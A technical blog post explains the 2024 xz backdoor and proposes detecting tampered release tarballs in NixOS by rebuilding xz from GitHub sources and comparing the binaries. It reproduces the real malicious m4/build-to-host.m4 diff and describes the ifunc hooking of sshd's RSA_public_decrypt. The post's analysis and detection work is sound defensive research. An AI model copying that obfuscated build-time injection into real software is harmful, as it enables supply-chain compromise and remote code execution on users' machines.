How NixOS and reproducible builds could have detected the xz backdoor for the benefit of all

Introduction

In March 2024, a backdoor was discovered in xz, a (de)compression tool that is used at the core of Linux distributions, among other things to unpack the source tarballs of packaged software. The backdoor had been covertly inserted over a period of three years by a malicious maintainer using the pseudonym Jia Tan. This event deeply stunned the open source community. The attack had massive potential impact, since it allowed remote code execution on every affected machine running an ssh server. It was also extremely difficult to detect. In fact, the catastrophe was only avoided thanks to the diligence (and maybe luck) of Andres Freund, a Postgres developer working at Microsoft. While investigating a seemingly unrelated 500ms performance regression in ssh on several Debian unstable machines, he traced it back to the liblzma library, identified the backdoor and documented it.

It was already established that the open source supply chain is often targeted by malicious actors. What is stunning here is the amount of energy Jia Tan invested in several steps: gaining the trust of the xz maintainer, acquiring push access to the repository, and then, among other perfectly legitimate contributions, inserting piece by piece the code for a very sophisticated and obfuscated backdoor. This should be a wake-up call for the OSS community. We should consider the open source supply chain a high-value target for powerful threat actors, and collectively find countermeasures against such attacks.

In this article, I’ll discuss the inner workings of the xz backdoor and how I think we could have mechanically detected it thanks to build reproducibility.

How does the attack work?

The main intent of the backdoor is to allow remote code execution on the target by hijacking the ssh server (sshd). To do that, it replaces the behavior of some of the functions sshd relies on, most importantly RSA_public_decrypt from OpenSSL's libcrypto. This lets an attacker execute arbitrary commands on a victim's machine when a specific RSA key is used to log in. Two main pieces are combined to install and activate the backdoor:

- A script to de-obfuscate and install a malicious object file as part of the xz build process. Interestingly, the backdoor was not entirely contained in the xz source code. The pieces that activate it were only present in the tarballs built and signed by the malicious maintainer Jia Tan and published alongside releases 5.6.0 and 5.6.1 of xz. These release tarballs contained slight, disguised modifications that extract a malicious object file from .xz files used as data for some tests in the repository.
- A procedure to hook the RSA_public_decrypt function. The backdoor uses the ifunc mechanism of glibc to modify the address of the RSA_public_decrypt function when sshd is loaded, provided sshd links against liblzma through libsystemd.

1. A script to de-obfuscate and install a malicious object file as part of the xz build process

As explained above, the malicious object file is stored directly in the xz git repository, hidden in some test files. Since xz is a decompression tool, its test cases include .xz files to be decompressed. This makes it possible to hide machine code in fake test files.

The backdoor is not active in the code contained in the git repository. It is only included when xz is built from the tarball released by the project. That tarball differs in a few places from the contents of the repository, most importantly in the m4/build-to-host.m4 file.

```diff
diff --git a/m4/build-to-host.m4 b/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
dnl This file is free software; the Free Software Foundation
dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
dnl Define somedir_c.
gl_final_[$1]="$[$1]"
+ gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
dnl Translate it from build syntax to host syntax.
case "$build_os" in
cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
[$1]_c_make='\"$([$1])\"'
fi
+ if test "x$gl_am_configmake" != "x"; then
+ gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+ else
+ gl_[$1]_config=''
+ fi
+ _LT_TAGDECL([], [gl_path_map], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+ _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+ _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+ _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
AC_SUBST([$1_c_make])
+
+ dnl If the host conversion code has been placed in $gl_config_gt,
+ dnl instead of duplicating it all over again into config.status,
+ dnl then we will have config.status run $gl_config_gt later, so it
+ dnl needs to know what name is stored there:
+ AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
])
dnl Some initializations for gl_BUILD_TO_HOST.
AC_DEFUN([gl_BUILD_TO_HOST_INIT],
[
+ dnl Search for Automake-defined pkg* macros, in the order
+ dnl listed in the Automake 1.10a+ documentation.
+ gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+ if test -n "$gl_am_configmake"; then
+ HAVE_PKG_CONFIGMAKE=1
+ else
+ HAVE_PKG_CONFIGMAKE=0
+ fi
+
gl_sed_double_backslashes='s/\\/\\\\/g'
gl_sed_escape_doublequotes='s/"/\\"/g'
+ gl_path_map='tr "\t \-_" " \t_\-"'
changequote(,)dnl
gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
changequote([,])dnl
```

These changes may look benign and well commented to a naive eye. In reality, they hide a chain of commands that de-obfuscates several fake .xz test files to ultimately produce two files:

- a shell script that is run during the build of xz;
- a malicious binary object file.

There is an excellent analysis from Russ Cox that explains in detail how these two malicious resources are produced during the build process, and I advise any interested reader to find all relevant details there.

The shell script run during the build has two main purposes:

- Verifying that the conditions to execute the backdoor are met on the builder (the backdoor targets specific Linux distributions, needs specific glibc features to be enabled, needs ssh to be installed, etc.);
- Modifying the (legitimate) liblzma_la-crc64_fast.o to use the _get_cpuid symbol defined in the backdoor object file.

2. A procedure to hook the RSA_public_decrypt function

So how does a backdoor in liblzma, the library built as part of xz, have any effect on sshd?

To understand that, we have to take a little detour into the realm of dynamic loaders and dynamically linked programs. Whenever a program depends on a library, there are two ways that library can be linked into the final executable:

- statically, in which case the library is embedded into the final executable, increasing its size;

- dynamically, in which case it is the role of the dynamic loader (ld-linux.so on Linux) to find that shared library when the program starts and load it into memory.

When a program is compiled using dynamic linking, the addresses of symbols belonging to dynamically linked libraries cannot be provided at compilation time, because their position in memory is not known ahead of time! Instead, a reference to the Global Offset Table (or GOT) is inserted. When the program starts, the dynamic linker fills in the actual addresses in the GOT.

The xz backdoor uses a glibc feature called ifunc (GNU indirect functions) to force code execution at dynamic loading time. ifunc is designed to select between several implementations of the same function at dynamic loading time.

```c
#include <stdio.h>

// Declaration of the ifunc resolver function
int (*resolve_add(void))(int, int);

// First version of the add function
int add_v1(int a, int b) {
    printf("Using add_v1\n");
    return a + b;
}

// Second version of the add function
int add_v2(int a, int b) {
    printf("Using add_v2\n");
    return a + b;
}

// Resolver function that chooses the correct version of the function.
// It is run when the dynamic loader resolves `add`, before main starts.
int (*resolve_add(void))(int, int) {
    // Any check could be implemented here (CPU features, for instance).
    // For simplicity, we check whether pointers are 64 bits wide.
    if (sizeof(void*) == 8) {
        return add_v2;
    } else {
        return add_v1;
    }
}

// Define the ifunc attribute for the add function
int add(int a, int b) __attribute__((ifunc("resolve_add")));

int main(void) {
    int result = add(10, 20);
    printf("Result: %d\n", result);
    return 0;
}
```

In the above example, the ifunc attribute attached to the add function indicates that the implementation to execute is determined at dynamic loading time by running the resolve_add function. Here, resolve_add returns add_v2 on a 64-bit system and add_v1 otherwise, and as such is completely harmless. The xz backdoor, however, uses this same technique to run malicious code at dynamic loading time.

But dynamic loading of which program? Well, of sshd! In some Linux distributions (Debian and Fedora, for example), OpenSSH is patched to support systemd notifications. For this purpose, sshd links with libsystemd, which in turn links with liblzma. In those distributions, sshd therefore has a transitive dependency on liblzma.

Figure: sshd and liblzma

This is how the backdoor works. Whenever sshd is executed, the dynamic loader loads libsystemd and then liblzma. With the backdoor installed, and leveraging the ifunc functionality explained above, the backdoor can run arbitrary code while liblzma is being loaded. Recall from the previous section that the backdoor script modifies one of the legitimate xz object files. More precisely, it modifies the resolver of one of the functions that use ifunc so that it calls the malicious _get_cpuid symbol. When called, this function meddles with the GOT, which is not yet read-only at this point of the execution. It modifies the address of the RSA_public_decrypt function, replacing it with a malicious one! That's it: from then on, sshd uses the malicious RSA_public_decrypt function, which grants the attacker remote code execution (RCE).

Once again, curious readers will find more detailed reports on exactly how the hooking happens, like this one. There is also a research article summarizing the attack vector and possible mitigations that I recommend reading.

Avoiding the xz catastrophe in the future

What should our takeaways be from this near miss, and what should we do to minimize the risk of such an attack happening again? Obviously, there is a lot to be said about the social issues at play here[1] and how we can make the OSS ecosystem more resilient against malicious entities taking over truly fundamental projects. In this piece, however, I'll only address the technical aspects of the question.

People are often convinced that OSS is more trustworthy than closed-source software because practitioners and security professionals can audit the code to detect vulnerabilities or backdoors. In this instance, such auditing was made difficult because part of the code activating the backdoor was not in the git repository. It was present only in the maintainer-provided tarball. This kept the backdoor out of sight of most investigating eyes, but it is also an opportunity for us to improve our software supply chain security processes.

Building software from trusted sources

One immediate observation that we can make in reaction to this supply chain incident is that it was only effective because a lot of distributions were using the maintainer provided tarball to build xz instead of the raw source code supplied by the git forge (in this case, GitHub). This reliance on release tarballs has plenty of historical and practical reasons:

- the tarball workflow predates the existence of git and was used in the earliest Linux distributions;
- tarballs are self-contained archives that encapsulate the exact state of the source code intended for release, while git repositories can be altered, creating the need for a snapshot of the code;
- tarballs can contain intermediary artifacts (for example manpages) used to lighten the build process, or configure scripts to target specific hardware, etc.;
- tarballs allow the source code to be compressed, which is useful for space efficiency.

That being said, in my opinion these reasons do not weigh enough to justify the security risks they create. Wherever it is technically feasible, we should build software from sources authenticated by the most trustworthy party. For example, if a project is developed on GitHub, GitHub automatically generates an archive for each release. That release archive is far less likely to be compromised than a malicious maintainer is to distribute unfaithful tarballs. Compromising it would require compromising the GitHub infrastructure, and at that point the problem is much more serious. The same reasoning applies whenever development happens on a platform operated by a trusted third party, such as Codeberg, SourceHut or GitLab.

When the situation allows it…

NixOS is a distribution built on the functional package management model: every package is encoded as an expression written in Nix, a functional programming language. A Nix expression for a software project is usually a function mapping all the project's dependencies to a "build recipe" that can later be executed to build the package. I am a NixOS developer, and when the backdoor was revealed I was surprised to see that the malicious version of xz had ended up being distributed to our users[2]. There is no formal policy about this. Still, NixOS maintainers have a culture of using the source archives automatically generated by GitHub, which are simply snapshots of the source code, through the fetchFromGitHub function whenever they are available. In the simplified xz package below, however, the sources come from another source fetcher, fetchurl. It extracts them from the manually uploaded, malicious maintainer-provided tarball.

```nix
{ lib, stdenv, fetchurl
, enableStatic ? stdenv.hostPlatform.isStatic
}:

stdenv.mkDerivation rec {
  pname = "xz";
  version = "5.6.0";

  src = fetchurl {
    url = "https://github.com/tukaani-project/xz/releases/download/v${version}/xz-${version}.tar.xz";
    hash = "sha256-AWGCxwu1x8nrNGUDDjp/a6ol4XsOjAr+kncuYCGEPOI=";
  };

  ...
}
```



To understand why, we must first talk about the bootstrap of nixpkgs. The idea of a bootstrap is that one could rebuild all of the packages in nixpkgs from a small set of seed binaries. This is an important security property: apart from those seed binaries, there are no external tools one must trust in order to trust the toolchain used to build the software distribution. In the context of a software distribution like nixpkgs, the "bootstrap" is all the steps needed to build the basic compilation environment used by other packages, called stdenv in nixpkgs. Building stdenv is not an easy task: how does one build gcc without a C compiler? The answer is that you start from a very small binary that does nothing fancy but is enough to build hex, a minimalist assembler. That assembler can in turn build a more complex assembler, and so on until we are able to build more complex software and finally a modern C compiler. The bootstrapping story of Nix/Guix is an incredibly interesting topic that I will not cover extensively here. I strongly advise reading the blog posts from the Guix community, which is on the bleeding edge: they have introduced a 357-byte bootstrap that is being adapted for nixpkgs.

What does all that have to do with xz, though? Well, xz is included in the nixpkgs bootstrap!



```shell
$ nix-build -A stdenv
/nix/store/91d27rjqlhkzx7mhzxrir1jcr40nyc7p-stdenv-linux
$ nix-store --query --graph result
```

We can now see that stdenv depends on xz at runtime, so xz is indeed built during the bootstrap stage. To better understand why this is the case, I'll also generate a graph of the software in stdenv that depends on xz at build time.



```shell
$ nix-store --query --graph $(nix eval --raw -f default.nix stdenv.drvPath)
```

We can see that several packages depend on xz. Let's take coreutils as an example and try to understand why it depends on xz. To do so, we read its derivation file, the intermediate representation of the build process obtained by evaluating the Nix expression for coreutils:

```json
{
  "/nix/store/57hlz5fnvfgljivf7p18fmcl1yp6d29z-coreutils-9.5.drv": {
    "args": [
      "-e",
      "/nix/store/v6x3cs394jgqfbi0a42pam708flxaphh-default-builder.sh"
    ],
    "builder": "/nix/store/razasrvdg7ckplfmvdxv4ia3wbayr94s-bootstrap-tools/bin/bash",
    ...
    "inputDrvs": {
      ...
      "/nix/store/c0wk92pcxbxi7579xws6bj12mrim1av6-xz-5.6.2.drv": {
        "dynamicOutputs": {},
        "outputs": [
          "bin"
        ]
      },
      "/nix/store/xv4333kfggq3zn065a3pwrj7ddbs4vzg-coreutils-9.5.tar.xz.drv": {
        "dynamicOutputs": {},
        "outputs": [
          "out"
        ]
      }
    },
    ...
    "system": "x86_64-linux"
  }
}
```

The inputDrvs field here corresponds to all the other packages or expressions that the coreutils build process depends on. In particular, we see that it depends on two components:

- /nix/store/c0wk92pcxbxi7579xws6bj12mrim1av6-xz-5.6.2.drv, which is xz itself;
- /nix/store/xv4333kfggq3zn065a3pwrj7ddbs4vzg-coreutils-9.5.tar.xz.drv, which is a source archive for coreutils! As it is a .xz archive, we need xz to unpack it, and that is where the dependency comes from!

The same reasoning applies to the other three direct dependencies that we could see in the graph earlier.

Because xz is built as part of the bootstrap, it doesn't have access to all the facilities that normal packages in nixpkgs can rely on. In particular, it can only use packages built earlier in the bootstrap. For example, to build xz from the git sources, we need autoconf to generate the configure script. But autoconf has a dependency on xz! Using the maintainer tarball allows us to break this dependency cycle.

```shell
$ nix why-depends --derivation nixpkgs#autoconf nixpkgs#xz
/nix/store/2rajzdx3wkivlc38fyhj0avyp10k2vjj-autoconf-2.72.drv
└───/nix/store/jnnb5ihdh6r3idmqrj2ha95ir42icafq-stdenv-linux.drv
    └───/nix/store/sqwqnilfwkw6p2f5gaj6n1xlsy054fnw-xz-5.6.4.drv
```

In conclusion, at the point in the nixpkgs graph where the xz package is built, the GitHub source archive cannot be used and we have to rely on the maintainer provided tarball, and hence, trust it. That does not mean that further verification cannot be implemented in nixpkgs, though…

Building trust into untrusted release tarballs

To recap, NixOS was vulnerable to the xz attack mainly because xz is built as part of the bootstrap phase. At that point, we rely on maintainer-provided tarballs instead of the ones generated by GitHub. This incident shows that we need specific protections to ensure that software built as part of our bootstrap is trustworthy.

1. By comparing sources

One idea that comes to mind is that a distribution should easily be able to verify that the source tarballs it uses are identical to the GitHub ones. There was even a pull request opened to introduce such a protection scheme. While this seems like a natural idea, it doesn't really work in practice. Maintainer-provided tarballs differ from the sources fairly often, and the difference is usually nothing to worry about.

Post by @bagder@mastodon.social

As Daniel Stenberg (the maintainer of curl) explains, the release tarball being different from the source is a feature. It allows the maintainer to include intermediary artifacts such as manpages or configure scripts. This is especially useful for distributions that want to build the program without depending on autoconf. Of course, from a supply chain security perspective, the freedom maintainers have in producing release assets is a liability, because it forces us to trust them to do it honestly.

2. Leveraging bitwise reproducibility

Build reproducibility is a property of a software project that holds when building it twice under the same conditions yields exactly the same (bitwise identical) artifacts. It is not easy to obtain, because all kinds of nondeterminism can creep into build processes (embedded timestamps, file ordering, and so on). Making as many packages as possible reproducible is the purpose of the Reproducible Builds project. Reproducibility is also recognized as instrumental in increasing trust in the distribution of binary artifacts (see Reproducible Builds: Increasing the Integrity of Software Supply Chains for a detailed report).

There are several ways bitwise reproducibility could be used to build up trust in untrusted maintainer provided tarballs:



Reproducibly building the tarball

A first approach, adopted by the PostgreSQL project, is to make the tarball generation process reproducible. This allows any user (or a Linux distribution) to independently verify that the maintainer-provided tarball was honestly generated from the original source code.

With this method, you can keep some advantages of building from tarballs (including the tarball containing some intermediary build artifacts like manpages or configure scripts). However, the drawback of this approach for software supply chain security is that it has to be implemented by upstream project maintainers. This means that adoption of this kind of security feature will probably be slow in the FOSS community, and while it is a good practice to make everything reproducible, including the tarball generation process, this is not the most effective way to increase software supply chain security today.

Checking for build convergence between various starting assets

Info: This part is about how I think NixOS could have detected the xz attack even though xz is built as part of the NixOS bootstrap phase.

Suppose xz is bitwise reproducible (and that is indeed the case), and the maintainer-provided tarball contains no modification that affects the build process. Then building it from the GitHub tarball or from the maintainer-provided tarball should produce the same artifacts, right? Based on this idea, my proposal is to build xz a second time after the bootstrap, this time using the GitHub tarball (which is only possible after the bootstrap). If the two builds differ, we can suspect a supply chain compromise.

Figure: Summary of the method I propose to detect vulnerable xz source tarballs

Let's see how this could be implemented:

First, we rewrite the xz package, this time using the fetchFromGitHub function. I create an after-bootstrap.nix file alongside the original xz expression in the pkgs/tools/compression/xz directory of nixpkgs:

```nix
{
  lib,
  stdenv,
  fetchurl,
  enableStatic ? false,
  writeScript,
  fetchFromGitHub,
  testers,
  gettext,
  autoconf,
  libtool,
  automake,
  perl,
  perl538Packages,
  doxygen,
  xz,
}:

stdenv.mkDerivation (finalAttrs: {
  pname = "xz";
  version = "5.6.1";

  src = fetchFromGitHub {
    owner = "tukaani-project";
    repo = "xz";
    rev = "v${finalAttrs.version}";
    hash = "sha256-alrSXZ0KWVlti6crmdxf/qMdrvZsY5yigcV9j6GIZ6c=";
  };

  strictDeps = true;
  configureFlags = lib.optional enableStatic "--disable-shared";
  enableParallelBuilding = true;
  doCheck = true;

  nativeBuildInputs = [ gettext autoconf libtool automake perl538Packages.Po4a doxygen perl ];

  # The GitHub archive ships no pre-generated configure script.
  preConfigure = ''
    ./autogen.sh
  '';
})
```

I removed some details here to focus on what matters most: the Nix expression is very similar to the actual derivation for xz. Apart from the method used to fetch the source, the only difference is that we need autoconf to generate the configure scripts. The maintainer-provided tarball ships these pre-generated (as Daniel Stenberg explains in the toot above). That is very handy when you build xz in the bootstrap phase of a distribution and don't want a dependency on autoconf/automake, but in this instance we have to generate them ourselves.

Now that we can build xz from the code archive provided by GitHub, we have to write Nix code to compare both outputs. For that purpose, we register a new phase called compareArtifacts that runs at the very end of the build process. To make my point, I'll first only compare the liblzma.so file (the one that was modified by the backdoor), but we could easily generalize this phase to all binary and library outputs:

```nix
postPhases = [ "compareArtifacts" ];

compareArtifacts = ''
  diff $out/lib/liblzma.so ${xz.out}/lib/liblzma.so
'';
```

After this change, building xz-after-bootstrap on master[3] still works, showing that in a normal setting, both artifacts are indeed identical.

```shell
$ nix-build -A xz-after-bootstrap
/nix/store/h23rfcjxbp1vqmmbvxkv0f69r579kfc1-xz-5.6.1
```

Let's now try our detection method on the backdoored xz and see what happens! We check out revision c53bbe3, which contains that version[4], and build xz-after-bootstrap.

```shell
$ git checkout c53bbe3
$ nix-build -A xz-after-bootstrap
/nix/store/57p62d3m98s2bgma5hcz12b4vv6nhijn-xz-5.6.1
```

Again, identical artifacts? Remember that the backdoor was not active in NixOS, partly because the script that installs it checks that the RPM_ARCH variable is set. So let's set it in pkgs/tools/compression/xz/default.nix to activate the backdoor[5]:

```nix
env.RPM_ARCH = true;
```

```shell
$ nix-build -A xz-after-bootstrap
/nix/store/57p62d3m98s2bgma5hcz12b4vv6nhijn-xz-5.6.1
...
...
Running phase: compareBins
Binary files /nix/store/cxz8iq3hx65krsyraill6figp03dk54n-xz-5.6.1/lib/liblzma.so and /nix/store/4qp2khyb22hg6a3jiy4hqmasjinfkp2g-xz-5.6.1/lib/liblzma.so differ
```

That's it, the binary artifacts are now different! Let's try to understand what makes them different by keeping both of them as part of the output. For that, we modify the compareArtifacts phase:

```nix
compareArtifacts = ''
  cp ${xz.out}/lib/liblzma.so $out/xzBootstrap
  cp $out/lib/liblzma.so $out/xzAfterBootstrap
  diff $out/lib/liblzma.so ${xz.out}/lib/liblzma.so || true
'';
```

This time the diff doesn't make the build fail, and we store both versions of liblzma.so so that we can compare them afterwards.

```shell
$ ls -lah result
total 69M
dr-xr-xr-x 6 root root 99 Jan 1 1970 .
drwxrwxr-t 365666 root nixbld 85M Dec 10 14:27 ..
dr-xr-xr-x 2 root root 4.0K Jan 1 1970 bin
dr-xr-xr-x 3 root root 32 Jan 1 1970 include
dr-xr-xr-x 3 root root 103 Jan 1 1970 lib
dr-xr-xr-x 4 root root 31 Jan 1 1970 share
-r-xr-xr-x 1 root root 210K Jan 1 1970 xzAfterBootstrap
-r-xr-xr-x 1 root root 258K Jan 1 1970 xzBootstrap
```

There is even a significant size difference between the two artifacts: the backdoored one is about 48 KiB larger. Let's try to understand where this difference comes from. We can use the nm command from binutils to list the symbols in an artifact:

```shell
$ nm result/xzAfterBootstrap
000000000000d3b0 t alone_decode
000000000000d380 t alone_decoder_end
000000000000d240 t alone_decoder_memconfig
0000000000008cc0 t alone_encode
0000000000008c90 t alone_encoder_end
0000000000008db0 t alone_encoder_init
0000000000020a80 t arm64_code
0000000000020810 t arm_code
0000000000020910 t armthumb_code
000000000000d8d0 t auto_decode
000000000000d8a0 t auto_decoder_end
000000000000d730 t auto_decoder_get_check
000000000000d7a0 t auto_decoder_init
000000000000d750 t auto_decoder_memconfig
0000000000022850 r available_checks.1
00000000000225f0 r bcj_optmap
0000000000008fb0 t block_buffer_encode
...
```

Now we can diff the symbols between the two artifacts:

```shell
$ diff -u0 <(nm --format=just-symbols xzAfterBootstrap) <(nm --format=just-symbols xzBootstrap)
--- /dev/fd/63 2024-12-10 15:27:11.477332683 +0000
+++ /dev/fd/62 2024-12-10 15:27:11.478332717 +0000
@@ -31,0 +32 @@
+_cpuid
@@ -65,0 +67 @@
+_get_cpuid
@@ -448,0 +451 @@
+__tls_get_addr@GLIBC_2.3
```

TADA! We see the added _get_cpuid symbol, documented in numerous technical reports about the xz backdoor, confirming that our method works!

Addendum 1: How to implement this safeguard in nixpkgs?

I think nixpkgs should implement this kind of safeguard for every package built during the bootstrap phase without a trusted source archive. The *-after-bootstrap packages could then be added to the channel blockers. If one of them ever failed to build, a big red alarm would go off and require intervention from the maintainers.

As a proof of concept, and to gather feedback from the community, I opened a pull request in the nixpkgs repository for the xz case. If the method is adopted, we should then implement it for the other candidate packages in nixpkgs's bootstrap.

Addendum 2: Evaluation: reproducibility of stdenv over time

As discussed above, the method I propose assumes that the packages we want to build trust in are bitwise reproducible. To help validate the approach, let's check whether the packages in the stdenv runtime are indeed reproducible. I did this as part of a bigger research project, whose findings are summarized in another blog post. I sampled 17 nixpkgs-unstable revisions from 2017 to 2023. For each revision, I rebuilt every derivation composing stdenv that is not a fixed-output derivation (FOD), using the nix-build --check command to check for bitwise reproducibility. Here are my findings:

- In every revision, xz was bitwise reproducible;
- In 12 of the 17 revisions, one or two packages were buildable but not reproducible. Those packages were consistent over time: for example, gcc was consistently non-reproducible from 2017 to 2021, and bash until 2019.

These findings show that this method cannot be applied to every package in stdenv, but they are encouraging. The packages that are not bitwise reproducible are consistently non-reproducible over time. It should therefore be possible to selectively activate the check on packages that exhibit good long-term reproducibility.

Addendum 3: Limitations: the trusting trust issue

The trusting trust issue is a famous thought experiment introduced by Ken Thompson in his Turing Award acceptance lecture. The idea is the following. Assume there is a backdoor in the compilers we use to build our software. The compiler propagates the backdoor to every new version of itself that it builds, but behaves normally for any other build, until at some point in time it starts backdooring every executable it produces. Modern compilers often need a previous version of themselves to be compiled, so there must be an initial executable that we have to trust to build our software. This makes such a sophisticated attack theoretically possible and completely undetectable. Similarly, the method I am proposing here assumes that the untrusted xz (the one built during the bootstrap phase) can't indirectly corrupt the build of xz-after-bootstrap to make the produced artifacts look identical. Again, such an attack would probably be extremely complex to craft, so this assumption seems sane.

Thanks

I would like to thank Théo Zimmermann, Pol Dellaiera, Martin Schwaighofer, and Stefano Zacchiroli for their valuable feedback and insightful discussions during the writing of this blog post. Their contributions significantly helped me organize and refine my ideas on this topic.

[1] Jia Tan essentially (through multiple identities) pressured the main xz maintainer into accepting new maintainers for the project, claiming that the project was receiving sub-par maintenance.

[2] Fortunately, even though the malicious version was available to users, the backdoor was not active on NixOS, as it was specifically made to target Debian and Fedora systems.

[3] Tested at the time of writing on revision 1426c51.

[4] For obvious reasons, the backdoored tarball has been deleted from GitHub and from the project's website, but it is still available in the NixOS cache!

[5] This illustrates both the power and the limitation of this method: it only detects modifications of the tarball that affect the final result. In the case of the xz backdoor, NixOS executables did not contain the backdoor, so without this modification we would not have discovered it. So yes, the title is a little bit catchy, but it illustrates the idea.